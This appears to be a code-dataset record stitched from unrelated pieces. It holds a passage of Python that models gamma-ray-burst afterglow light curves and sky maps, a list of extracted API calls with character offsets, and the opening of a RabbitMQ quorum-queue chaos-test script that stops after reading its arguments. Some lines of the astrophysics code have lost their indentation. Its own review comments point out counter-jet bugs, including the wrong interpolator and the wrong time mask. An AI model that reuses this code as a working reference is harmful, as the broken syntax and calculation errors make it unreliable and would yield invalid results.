fluxMax = zeros(len(tt))
#print len(nuM), len(nuC), len()
nuM[fil1] = self.RSpeak_nuM_struc[ii]*(tt[fil1]/self.cell_Tds[ii])**(6.)
nuC[fil1] = self.RSpeak_nuC_struc[ii]*(tt[fil1]/self.cell_Tds[ii])**(-2.)
fluxMax[fil1] = self.RSpeak_Fnu_struc[ii]*(tt[fil1]/self.cell_Tds[ii])**(3./2.) # Returns fluxes in Jy
nuM[fil2] = self.RSpeak_nuM_struc[ii]*(tt[fil2]/self.cell_Tds[ii])**(-54./35.)
nuC[fil2] = self.RSpeak_nuC_struc[ii]*(tt[fil2]/self.cell_Tds[ii])**(4./35.)
fluxMax[fil2] = self.RSpeak_Fnu_struc[ii]*(tt[fil2]/self.cell_Tds[ii])**(-34./35.) # Returns fluxes in Jy
return Rb**(1./2.)*nuM, Rb**(-3./2.)*nuC, Rb**(1./2.)*fluxMax
    def light_curve_adiabatic(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
        """
        Observed light curves for the adiabatic evolution of the structured
        jet: forward shock, reverse shock and counter-jet, summed over cells.

        theta_obs is the observer angle (rad), obsFreqs the observed
        frequency/frequencies (Hz), tt0/ttf the observer-time window (days),
        num the number of time-grid points and Rb the reverse-shock
        magnetisation parameter.
        """
        if type(obsFreqs)==float:
            obsFreqs = array([obsFreqs])
        calpha = self.obsangle(theta_obs)
        alpha = arccos(calpha)
        # Obserer angle for the counter-jet
        calpha_cj = self.obsangle_cj(theta_obs)
        alpha_cj = arccos(calpha_cj)
        # Latest observable time from the outermost cell's final state.
        Tfil = self.TTs[:,-1]== max(self.TTs[:,-1])
        max_Tobs = self.RRs[Tfil, -1]/(self.Betas[Tfil,-1]*cts.cc) * (1.-self.Betas[Tfil,-1]*cos(max(alpha)))
        #max_Tobs_oa = max(self.TTs[:,-1])
        #max_Tobs = max(obsTime_offAxis(self, self.RRs, self.TTs[:,alpha==max(alpha)][:,0], max(alpha)))/cts.sTd
        if ttf>max_Tobs:
            print("ttf larger than maximum observable time. Adjusting value. ")
            ttf = max_Tobs
        lt0 = log10(tt0*cts.sTd) # Convert to seconds and then logspace
        ltf = log10(ttf*cts.sTd) # Convert to seconds and then logspace
        tts = logspace(lt0, ltf+(ltf-lt0)/num, num) # Timeline on which the flux is evaluated.
        light_curve = zeros([len(obsFreqs), num])
        light_curve_RS = zeros([len(obsFreqs), num])
        light_curve_CJ = zeros([len(obsFreqs), num])
        for ii in tqdm(range(self.ncells)):
        #for ii in range(self.ncells):
            ttobs = obsTime_offAxis_UR(self.RRs[:,ii], self.TTs[:,ii], self.Betas[:,ii], alpha[ii])
            RRs = self.RRs[:,ii]
            # Observer-time bins covered by this cell.
            filTM = where(tts<=max(ttobs))[0]
            filTm = where(tts[filTM]>=min(ttobs))[0]
            filTM_cj = where(tts<=max(ttobs))[0]
            filTm_cj = where(tts[filTM_cj]>=min(ttobs))[0]
            Rint = interp1d(ttobs, RRs)
            Gamint = interp1d(RRs, self.Gams[:,ii])
            Robs = Rint(tts[filTM][filTm])
            GamObs = Gamint(Robs)
            BetaObs = sqrt(1.-GamObs**(-2.))
            dopFacs = self.dopplerFactor(calpha[ii], sqrt(1.-GamObs**(-2)))
            afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM][filTm], 2.*pi*(1.-cos(1./GamObs)))
            onAxisTobs = dopFacs*tts[filTM][filTm]
            # Forward shock stuff
            Bfield = sqrt(32.*pi*self.nn*self.epB*cts.mp)*cts.cc*GamObs
            gamMobs, nuMobs = minGam(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield)
            gamCobs, nuCobs = critGam(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
            Fnuobs = fluxMax(Robs, GamObs, self.nn, Bfield, self.DD)
            #Reverse shock stuff
            nuM_RS, nuC_RS, Fnu_RS = self.params_tt_RS(onAxisTobs, ii, Rb)
            # Counter jet stuff
            ttobs_cj = obsTime_offAxis_UR(self.RRs[:,ii], self.TTs[:,ii], self.Betas[:,ii], alpha_cj[ii])
            filTM_cj = where(tts<=max(ttobs_cj))[0]
            # NOTE(review): the next line filters tts[filTM] (forward-jet
            # mask) rather than tts[filTM_cj] — looks like a copy-paste slip;
            # confirm against the intended counter-jet window.
            filTm_cj = where(tts[filTM]>=min(ttobs_cj))[0]
            Rint_cj = interp1d(ttobs_cj, RRs)
            #Gamint = interp1d(RRs, self.Gams[:,ii])
            # NOTE(review): Robs_cj is interpolated with the forward-jet Rint,
            # leaving Rint_cj unused — presumably Rint_cj was intended.
            Robs_cj = Rint(tts[filTM_cj][filTm_cj])
            GamObs_cj = Gamint(Robs_cj)
            if len(GamObs_cj)==0: continue
            BetaObs_cj = sqrt(1.-GamObs_cj**(-2.))
            dopFacs_cj = self.dopplerFactor(calpha_cj[ii], sqrt(1.-GamObs_cj**(-2)))
            afac_cj = self.cellSize/maximum(self.cellSize*ones(num)[filTM_cj][filTm_cj], 2.*pi*(1.-cos(1./GamObs_cj)))
            onAxisTobs_cj = dopFacs_cj*tts[filTM_cj][filTm_cj]
            Bfield_cj = sqrt(32.*pi*self.nn*self.epB*cts.mp)*cts.cc*GamObs_cj
            gamMobs_cj, nuMobs_cj = minGam(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj)
            gamCobs_cj, nuCobs_cj = critGam(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, onAxisTobs_cj)
            Fnuobs_cj = fluxMax(Robs_cj, GamObs_cj, self.nn, Bfield_cj, self.DD)
            dopFacs_cj = self.dopplerFactor(calpha_cj[ii], sqrt(1.-GamObs_cj**(-2)))
            dopFacs = self.dopplerFactor(calpha[ii], sqrt(1.-GamObs**(-2)))
            afac = self.cellSize/maximum(self.cellSize*ones(num)[filTM][filTm], 2.*pi*(1.-cos(1./GamObs)))
            for freq in obsFreqs:
                # Slow-cooling masks; fast-cooling contributions are disabled.
                fil1, fil2 = where(gamMobs<=gamCobs)[0], where(gamMobs>gamCobs)[0]
                fil3, fil4 = where(nuM_RS<=nuC_RS)[0], where(nuM_RS>nuC_RS)[0]
                fil5, fil6 = where(nuMobs_cj<=nuCobs_cj)[0], where(nuMobs_cj>nuCobs_cj)[0]
                freqs = freq/dopFacs # Calculate the rest-frame frequencies correspondng to the observed frequency
                freqs_cj = freq/dopFacs_cj
                #print shape(freqs), shape(freqs[fil1]), shape(nuMobs[fil1]), shape(nuCobs[fil1]), shape(Fnuobs[fil1]), shape(afac[fil1]), shape(calpha)
                #print shape(light_curve[obsFreqs==freq, filT]), shape([fil1])
                #print fil1
                light_curve[obsFreqs==freq, filTM[filTm][fil1]] = light_curve[obsFreqs==freq, filTM[filTm][fil1]] + (
                        afac[fil1] * dopFacs[fil1]**3. * FluxNuSC_arr(self, nuMobs[fil1], nuCobs[fil1], Fnuobs[fil1], freqs[fil1]))*calpha[ii]
                #light_curve[obsFreqs==freq, filTM[filTm][fil2]] = light_curve[obsFreqs==freq, filTM[filTm][fil2]] + (
                #        afac[fil2] * dopFacs[fil2]**3. * FluxNuFC_arr(self, nuMobs[fil2], nuCobs[fil2], Fnuobs[fil2], freqs[fil2]))*calpha[ii]
                light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] + (
                        afac[fil3] * dopFacs[fil3]**3. * FluxNuSC_arr(self, nuM_RS[fil3], nuC_RS[fil3], Fnu_RS[fil3], freqs[fil3]))*calpha[ii]
                #light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] + (
                #        afac[fil4] * dopFacs[fil4]**3. * FluxNuFC_arr(self, nuM_RS[fil4], nuC_RS[fil4], Fnu_RS[fil4], freqs[fil4]))*calpha[ii]
                light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] = light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] + (
                        afac_cj[fil5] * dopFacs_cj[fil5]**3. * FluxNuSC_arr(self, nuMobs_cj[fil5], nuCobs_cj[fil5], Fnuobs_cj[fil5], freqs_cj[fil5]))*calpha_cj[ii]
        return tts, light_curve, light_curve_RS, light_curve_CJ
#return tts, 2.*light_curve, 2.*light_curve_RS
    def light_curve_peer(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
        """
        Observed light curves for the Pe'er-type evolution of the structured
        jet: forward shock, reverse shock and counter-jet, summed over cells.

        theta_obs is the observer angle (rad), obsFreqs the observed
        frequency/frequencies (Hz), tt0/ttf the observer-time window (days),
        num the number of time-grid points and Rb the reverse-shock
        magnetisation parameter.
        """
        if type(obsFreqs)==float:
            obsFreqs = array([obsFreqs])
        calpha = self.obsangle(theta_obs)
        alpha = arccos(calpha)
        # Obserer angle for the counter-jet
        calpha_cj = self.obsangle_cj(theta_obs)
        alpha_cj = arccos(calpha_cj)
        # Latest observable time from the most off-axis cell.
        Tfil = self.TTs[:,-1]== max(self.TTs[:,-1])
        max_Tobs = max(obsTime_offAxis_General(self.RRs, self.TTs[:,-1], max(alpha)))
        if ttf>max_Tobs:
            print("ttf larger than maximum observable time. Adjusting value.")
            ttf = max_Tobs
        lt0 = log10(tt0*cts.sTd) # Convert to seconds and then logspace
        ltf = log10(ttf*cts.sTd) # Convert to seconds and then logspace
        tts = logspace(lt0, ltf+(ltf-lt0)/num, num) # Timeline on which the flux is evaluated.
        light_curve = zeros([len(obsFreqs), num])
        light_curve_RS = zeros([len(obsFreqs), num])
        light_curve_CJ = zeros([len(obsFreqs), num])
        RRs = self.RRs
        for ii in tqdm(range(self.ncells)):
            ttobs = obsTime_offAxis_General(self.RRs, self.TTs[:,ii], alpha[ii])
            # Observer-time bins covered by this cell.
            filTM = where(tts<=max(ttobs))[0]
            filTm = where(tts[filTM]>=min(ttobs))[0]
            Rint = interp1d(ttobs, RRs)
            Gamint = interp1d(RRs, self.Gams[:,ii])
            Robs = Rint(tts[filTM][filTm])
            GamObs = Gamint(Robs)
            BetaObs = sqrt(1.-GamObs**(-2.))
            if len(GamObs)==0: continue
            onAxisTint = interp1d(RRs, self.TTs[:,ii])
            #onAxisTobs = obsTime_onAxis_integrated(Robs, GamObs, BetaObs)
            onAxisTobs = onAxisTint(Robs)
            #Bfield = sqrt(32.*pi*cts.mp*self.nn*self.epB*GamObs*(GamObs-1.))*cts.cc
            #gamMobs, nuMobs = minGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield)
            #gamCobs, nuCobs = critGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
            # Forward-shock synchrotron parameters (modified prescriptions).
            Bfield = Bfield_modified(GamObs, BetaObs, self.nn, self.epB)
            gamMobs, nuMobs = minGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, self.Xp)
            gamCobs, nuCobs = critGam_modified(GamObs, self.epE, self.epB, self.nn, self.pp, Bfield, onAxisTobs)
            #nuMobs, nuCobs = GamObs*nuMobs, GamObs*nuCobs
            Fnuobs = fluxMax_modified(Robs, GamObs, self.nn, Bfield, self.DD, self.PhiP)
            #Reverse shock stuff
            nuM_RS, nuC_RS, Fnu_RS = self.params_tt_RS(onAxisTobs, ii, Rb)
            dopFacs = self.dopplerFactor(calpha[ii], sqrt(1.-GamObs**(-2)))
            # Counter jet stuff
            ttobs_cj = obsTime_offAxis_General(self.RRs, self.TTs[:,ii], alpha_cj[ii])
            filTM_cj = where(tts<=max(ttobs_cj))[0]
            filTm_cj = where(tts[filTM_cj]>=min(ttobs_cj))[0]
            Rint_cj = interp1d(ttobs_cj, RRs)
            #Gamint = interp1d(RRs, self.Gams[:,ii])
            # NOTE(review): Robs_cj is interpolated with the forward-jet Rint,
            # leaving Rint_cj unused — presumably Rint_cj was intended.
            Robs_cj = Rint(tts[filTM_cj][filTm_cj])
            GamObs_cj = Gamint(Robs_cj)
            if len(GamObs_cj)==0: continue
            BetaObs_cj = sqrt(1.-GamObs_cj**(-2.))
            onAxisTobs_cj = onAxisTint(Robs_cj)
            # Counter-jet synchrotron parameters.
            Bfield_cj = Bfield_modified(GamObs_cj, BetaObs_cj, self.nn, self.epB)
            gamMobs_cj, nuMobs_cj = minGam_modified(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, self.Xp)
            gamCobs_cj, nuCobs_cj = critGam_modified(GamObs_cj, self.epE, self.epB, self.nn, self.pp, Bfield_cj, onAxisTobs_cj)
            Fnuobs_cj = fluxMax_modified(Robs_cj, GamObs_cj, self.nn, Bfield_cj, self.DD, self.PhiP)
            dopFacs_cj = self.dopplerFactor(calpha_cj[ii], sqrt(1.-GamObs_cj**(-2)))
            #nuMobs = nuMobs/dopFacs
            #nuCobs = nuCobs/dopFacs
            #nuMobs_cj = nuMobs_cj/dopFacs_cj
            #nuCobs_cj = nuCobs_cj/dopFacs_cj
            for freq in obsFreqs:
                # Slow-cooling masks; fast-cooling contributions are disabled.
                fil1, fil2 = where(gamMobs<=gamCobs)[0], where(gamMobs>gamCobs)[0]
                fil3, fil4 = where(nuM_RS<=nuC_RS)[0], where(nuM_RS>nuC_RS)[0]
                freqs = freq/dopFacs # Calculate the rest-frame frequencies correspondng to the observed frequency
                light_curve[obsFreqs==freq, filTM[filTm][fil1]] = light_curve[obsFreqs==freq, filTM[filTm][fil1]] + (
                        self.cellSize*(GamObs[fil1]*(1.-BetaObs[fil1]*calpha[ii]))**(-3.) * FluxNuSC_arr(self, nuMobs[fil1], nuCobs[fil1], Fnuobs[fil1], freqs[fil1]))#*calpha[ii]
                #light_curve[obsFreqs==freq, filTM[filTm][fil2]] = light_curve[obsFreqs==freq, filTM[filTm][fil2]] + (
                #        (GamObs[fil2]*(1.-BetaObs[fil2]*calpha[fil2][ii]))**(-3.) * FluxNuFC_arr(self, nuMobs[fil2], nuCobs[fil2], Fnuobs[fil2], freqs[fil2]))#*calpha[ii]
                light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil3]] + (
                        self.cellSize*(GamObs[fil3]*(1.-BetaObs[fil3]*calpha[ii]))**(-3.) * FluxNuSC_arr(self, nuM_RS[fil3], nuC_RS[fil3], Fnu_RS[fil3], freqs[fil3]))#*calpha[ii]
                #light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] = light_curve_RS[obsFreqs==freq, filTM[filTm][fil4]] + (
                #        (GamObs[fil4]*(1.-BetaObs[fil4]*calpha[fil4][ii]))**(-3.)* FluxNuFC_arr(self, nuM_RS[fil4], nuC_RS[fil4], Fnu_RS[fil4], freqs[fil4]))#*calpha[ii]
                fil5, fil6 = where(nuMobs_cj<=nuCobs_cj)[0], where(nuMobs_cj>nuCobs_cj)[0]
                freqs_cj = freq/dopFacs_cj
                light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] = light_curve_CJ[obsFreqs==freq, filTM_cj[filTm_cj][fil5]] + (
                        self.cellSize*(GamObs_cj[fil5]*(1.-BetaObs_cj[fil5]*calpha_cj[ii]))**(-3.) * FluxNuSC_arr(self,
                        nuMobs_cj[fil5], nuCobs_cj[fil5], Fnuobs_cj[fil5], freqs_cj[fil5]))#*calpha[ii]
        return tts, light_curve, light_curve_RS, light_curve_CJ
#return tts, 2.*light_curve, 2.*light_curve_RS
def lightCurve_interp(self, theta_obs, obsFreqs, tt0, ttf, num, Rb):
if self.evolution == "adiabatic":
tts, light_curve, light_curve_RS, light_curve_CJ = self.light_curve_adiabatic(theta_obs, obsFreqs, tt0, ttf, num, Rb)
elif self.evolution == "peer":
tts, light_curve, light_curve_RS, light_curve_CJ = self.light_curve_peer(theta_obs, obsFreqs, tt0, ttf, num, Rb)
return tts, light_curve, light_curve_RS, light_curve_CJ
    def skymap(self, theta_obs, tt_obs, freq, nx, ny, xx0, yy0):
        """Compute an afterglow sky image at observer time ``tt_obs`` and frequency ``freq``.

        For every shell cell (first half of each array) and its counter-jet
        mirror cell (second half), the blast-wave history is interpolated to
        the radius reached at the requested observer time, synchrotron
        spectral quantities are evaluated there, and the Doppler-boosted
        flux is attached to the cell's projected image coordinates.

        Returns ``(im_xxs, im_yys, fluxes, fluxes2, RRs, Gams, calpha, TTs)``.

        NOTE(review): ``nx``, ``ny``, ``xx0``, ``yy0`` are accepted but never
        used in this method -- presumably consumed by a caller that bins the
        returned points onto an image grid; confirm.
        """
        # Cosine of the angle between each cell's motion and the line of
        # sight; jet cells in the first half, counter-jet in the second.
        calpha = zeros([2*self.ncells])
        alpha = zeros([2*self.ncells])
        calpha[:self.ncells] = self.obsangle(theta_obs)
        calpha[self.ncells:] = self.obsangle_cj(theta_obs)
        # (alpha is recomputed here; the zeros() assigned above is redundant)
        alpha = arccos(calpha)
        TTs, RRs, Gams, Betas = zeros(2*self.ncells), zeros(2*self.ncells), zeros(2*self.ncells), zeros(2*self.ncells)
        #nuMs, nuCs, fluxes = zeros(2.*self.ncells), zeros(2.*self.ncells), zeros(2.*self.ncells)
        fluxes = zeros(2*self.ncells)
        # Sky-plane coordinates (unit-sphere projection, scaled by radius at
        # the end); the counter jet uses mirrored polar angles pi - cthetas.
        im_xxs, im_yys = zeros(2*self.ncells), zeros(2*self.ncells)
        im_xxs[:self.ncells] = -1.*cos(theta_obs)*sin(self.cthetas)*sin(self.cphis) + sin(theta_obs)*cos(self.cthetas)
        im_yys[:self.ncells] = sin(self.cthetas)*cos(self.cphis)
        im_xxs[self.ncells:] = -1.*cos(theta_obs)*sin(pi-self.cthetas)*sin(self.cphis) + sin(theta_obs)*cos(pi-self.cthetas)
        im_yys[self.ncells:] = sin(pi-self.cthetas)*cos(self.cphis)
        if self.evolution == 'adiabatic':
            # Adiabatic dynamics: per-cell radius grids (self.RRs is 2-D,
            # indexed [:, ii]) and the ultra-relativistic observer-time map.
            for ii in tqdm(range(self.ncells)):
                Tint = interp1d(self.RRs[:,ii], self.TTs[:,ii])
                ttobs = obsTime_offAxis_UR(self.RRs[:,ii], self.TTs[:,ii], self.Betas[:,ii], alpha[ii])
                ttobs_cj = obsTime_offAxis_UR(self.RRs[:,ii], self.TTs[:,ii], self.Betas[:,ii], alpha[ii+self.ncells])
                Rint = interp1d(ttobs, self.RRs[:,ii])
                Rint_cj = interp1d(ttobs_cj, self.RRs[:,ii])
                RRs[ii] = Rint(tt_obs)
                RRs[ii+self.ncells] = Rint_cj(tt_obs)
                TTs[ii], TTs[ii+self.ncells] = Tint(RRs[ii]), Tint(RRs[ii+self.ncells])
                GamInt = interp1d(self.RRs[:,ii], self.Gams[:,ii])
                Gams[ii], Gams[ii+self.ncells] = GamInt(RRs[ii]), GamInt(RRs[ii+self.ncells])
            Betas = sqrt(1.-Gams**(-2.))
            Bf = (32.*pi*self.nn*self.epB*cts.mp)**(1./2.) * Gams*cts.cc
            gamM, nuM = minGam(Gams, self.epE, self.epB, self.nn, self.pp, Bf)
            gamC, nuC = critGam(Gams, self.epE, self.epB, self.nn, self.pp, Bf, TTs)
            flux = fluxMax(RRs, Gams, self.nn, Bf, self.DD)
            #fluxMax[Gams<=2] = 0.
            dopFacs = self.dopplerFactor(calpha, sqrt(1.-Gams**(-2)))
            # Beaming-cone area factor, capped at the cell size.
            afac = self.cellSize/maximum(self.cellSize, 2.*pi*(1.-cos(1./Gams)))
            obsFreqs = freq/dopFacs
            fluxes = (self.DD**2./(abs(calpha)*self.cellSize*RRs**2.)) * afac * dopFacs**3. * FluxNuSC_arr(self, nuM, nuC, flux, obsFreqs)
        elif self.evolution == 'peer':
            # Peer dynamics: a single shared radius grid (self.RRs is 1-D
            # here) and the general off-axis observer-time map.
            for ii in tqdm(range(self.ncells)):
                Tint = interp1d(self.RRs, self.TTs[:,ii])
                ttobs = obsTime_offAxis_General(self.RRs, self.TTs[:,ii], alpha[ii])
                ttobs_cj = obsTime_offAxis_General(self.RRs, self.TTs[:,ii], alpha[ii+self.ncells])
                Rint, Rint_cj = interp1d(ttobs, self.RRs), interp1d(ttobs_cj, self.RRs)
                RRs[ii], RRs[ii+self.ncells] = Rint(tt_obs), Rint_cj(tt_obs)
                TTs[ii], TTs[ii+self.ncells] = Tint(RRs[ii]), Tint(RRs[ii+self.ncells])
                GamInt = interp1d(self.RRs, self.Gams[:,ii])
                Gams[ii], Gams[ii+self.ncells] = GamInt(RRs[ii]), GamInt(RRs[ii+self.ncells])
            Betas = sqrt(1.-Gams**(-2.))
            Bf = Bfield_modified(Gams, Betas, self.nn, self.epB)
            gamM, nuM = minGam_modified(Gams, self.epE, self.epB, self.nn, self.pp, Bf, self.Xp)
            gamC, nuC = critGam_modified(Gams, self.epE, self.epB, self.nn, self.pp, Bf, TTs)
            flux = fluxMax_modified(RRs, Gams, self.nn, Bf, self.DD, self.PhiP)
            #fluxMax[Gams<=5] = 0.
            #nuM, nuC = nuM/Gams, nuC/Gams
            dopFacs = self.dopplerFactor(calpha, Betas)
            obsFreqs = freq/dopFacs
            #afac = self.cellSize/maximum(self.cellSize*ones(self.ncells), 2.*pi*(1.-cos(1./Gams)))
            fluxes = (self.DD**2./(abs(calpha)*self.cellSize*RRs**2.)) *self.cellSize* (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, flux, obsFreqs)
            #fluxes = (Gams*(1.-Betas*calpha))**(-3.) * FluxNuSC_arr(self, nuM, nuC, fluxMax, obsFreqs)*1./calpha
        # NOTE(review): fluxes2 uses nuM/nuC/flux from whichever branch ran;
        # an unknown self.evolution would hit a NameError here.
        fluxes2 = self.cellSize*(Gams*(1.-Betas*calpha))**(-3.)*FluxNuSC_arr(self, nuM, nuC, flux, obsFreqs)
        # Scale the unit-sphere projections by each cell's radius.
        im_xxs = RRs*im_xxs
        im_yys = RRs*im_yys
        return im_xxs, im_yys, fluxes, fluxes2, RRs, Gams, calpha, TTs
|
[
"scipy.interpolate.interp1d",
"tqdm.tqdm"
] |
[((7054, 7082), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs'], {}), '(self.RRs, self.TTs)\n', (7062, 7082), False, 'from scipy.interpolate import interp1d\n'), ((7511, 7536), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (7519, 7536), False, 'from scipy.interpolate import interp1d\n'), ((8503, 8531), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (8511, 8531), False, 'from scipy.interpolate import interp1d\n'), ((13425, 13453), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs'], {}), '(self.RRs, self.TTs)\n', (13433, 13453), False, 'from scipy.interpolate import interp1d\n'), ((13975, 14000), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (13983, 14000), False, 'from scipy.interpolate import interp1d\n'), ((14443, 14471), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (14451, 14471), False, 'from scipy.interpolate import interp1d\n'), ((20092, 20120), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs'], {}), '(self.RRs, self.TTs)\n', (20100, 20120), False, 'from scipy.interpolate import interp1d\n'), ((20144, 20157), 'tqdm.tqdm', 'tqdm', (['indices'], {}), '(indices)\n', (20148, 20157), False, 'from tqdm import tqdm\n'), ((37759, 37779), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'RRs'], {}), '(ttobs, RRs)\n', (37767, 37779), False, 'from scipy.interpolate import interp1d\n'), ((37806, 37837), 'scipy.interpolate.interp1d', 'interp1d', (['RRs', 'self.Gams[:, ii]'], {}), '(RRs, self.Gams[:, ii])\n', (37814, 37837), False, 'from scipy.interpolate import interp1d\n'), ((39053, 39076), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'RRs'], {}), '(ttobs_cj, RRs)\n', (39061, 39076), False, 'from scipy.interpolate import interp1d\n'), ((44192, 44212), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 
'RRs'], {}), '(ttobs, RRs)\n', (44200, 44212), False, 'from scipy.interpolate import interp1d\n'), ((44239, 44270), 'scipy.interpolate.interp1d', 'interp1d', (['RRs', 'self.Gams[:, ii]'], {}), '(RRs, self.Gams[:, ii])\n', (44247, 44270), False, 'from scipy.interpolate import interp1d\n'), ((44484, 44514), 'scipy.interpolate.interp1d', 'interp1d', (['RRs', 'self.TTs[:, ii]'], {}), '(RRs, self.TTs[:, ii])\n', (44492, 44514), False, 'from scipy.interpolate import interp1d\n'), ((45926, 45949), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'RRs'], {}), '(ttobs_cj, RRs)\n', (45934, 45949), False, 'from scipy.interpolate import interp1d\n'), ((20398, 20423), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (20406, 20423), False, 'from scipy.interpolate import interp1d\n'), ((20451, 20479), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (20459, 20479), False, 'from scipy.interpolate import interp1d\n'), ((21641, 21669), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs'], {}), '(self.RRs, self.TTs)\n', (21649, 21669), False, 'from scipy.interpolate import interp1d\n'), ((51083, 51125), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs[:, ii]', 'self.TTs[:, ii]'], {}), '(self.RRs[:, ii], self.TTs[:, ii])\n', (51091, 51125), False, 'from scipy.interpolate import interp1d\n'), ((51387, 51419), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs[:, ii]'], {}), '(ttobs, self.RRs[:, ii])\n', (51395, 51419), False, 'from scipy.interpolate import interp1d\n'), ((51450, 51485), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs[:, ii]'], {}), '(ttobs_cj, self.RRs[:, ii])\n', (51458, 51485), False, 'from scipy.interpolate import interp1d\n'), ((51719, 51762), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs[:, ii]', 'self.Gams[:, ii]'], {}), '(self.RRs[:, ii], self.Gams[:, ii])\n', (51727, 51762), False, 'from 
scipy.interpolate import interp1d\n'), ((26684, 26723), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs[:]', 'self.Gams[:, ii]'], {}), '(self.RRs[:], self.Gams[:, ii])\n', (26692, 26723), False, 'from scipy.interpolate import interp1d\n'), ((52763, 52798), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.TTs[:, ii]'], {}), '(self.RRs, self.TTs[:, ii])\n', (52771, 52798), False, 'from scipy.interpolate import interp1d\n'), ((53303, 53339), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs', 'self.Gams[:, ii]'], {}), '(self.RRs, self.Gams[:, ii])\n', (53311, 53339), False, 'from scipy.interpolate import interp1d\n'), ((21929, 21954), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (21937, 21954), False, 'from scipy.interpolate import interp1d\n'), ((21956, 21984), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (21964, 21984), False, 'from scipy.interpolate import interp1d\n'), ((27300, 27343), 'scipy.interpolate.interp1d', 'interp1d', (['self.RRs[:, ii]', 'self.Gams[:, ii]'], {}), '(self.RRs[:, ii], self.Gams[:, ii])\n', (27308, 27343), False, 'from scipy.interpolate import interp1d\n'), ((53034, 53059), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs', 'self.RRs'], {}), '(ttobs, self.RRs)\n', (53042, 53059), False, 'from scipy.interpolate import interp1d\n'), ((53061, 53089), 'scipy.interpolate.interp1d', 'interp1d', (['ttobs_cj', 'self.RRs'], {}), '(ttobs_cj, self.RRs)\n', (53069, 53089), False, 'from scipy.interpolate import interp1d\n')]
|
#!/usr/bin/env python
import pika
import sys
import time
import datetime
import subprocess
import random
import threading
import requests
import json
from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated
from RabbitPublisher import RabbitPublisher
from MultiTopicConsumer import MultiTopicConsumer
from QueueStats import QueueStats
from ChaosExecutor import ChaosExecutor
from printer import console_out
from MessageMonitor import MessageMonitor
from ConsumerManager import ConsumerManager
from BrokerManager import BrokerManager
def main():
    """Run a series of chaos tests against RabbitMQ quorum queues.

    For each test run a fresh cluster is deployed, a quorum queue is
    created, one publisher and one consumer are started, then random
    chaos actions (partitions and/or node kills) are executed.  After
    repairing the cluster the run waits for the consumer to catch up
    and reports lost or out-of-order messages.
    """
    print("quorum-queue-test.py")
    # ----- command-line configuration --------------------------------
    args = get_args(sys.argv)
    count = -1 # no limit
    tests = int(get_mandatory_arg(args, "--tests"))
    actions = int(get_mandatory_arg(args, "--actions"))
    in_flight_max = int(get_optional_arg(args, "--in-flight-max", 10))
    grace_period_sec = int(get_mandatory_arg(args, "--grace-period-sec"))
    cluster_size = get_optional_arg(args, "--cluster", "3")
    queue = get_mandatory_arg(args, "--queue")
    sac_enabled = is_true(get_mandatory_arg(args, "--sac"))
    chaos_mode = get_optional_arg(args, "--chaos-mode", "mixed")
    chaos_min_interval = int(get_optional_arg(args, "--chaos-min-interval", "30"))
    chaos_max_interval = int(get_optional_arg(args, "--chaos-max-interval", "120"))
    prefetch = int(get_optional_arg(args, "--pre-fetch", "10"))
    rmq_version = get_optional_arg_validated(args, "--rmq-version", "3.8-beta", ["3.7", "3.8-beta", "3.8-alpha"])
    for test_number in range(1, tests+1):
        print("")
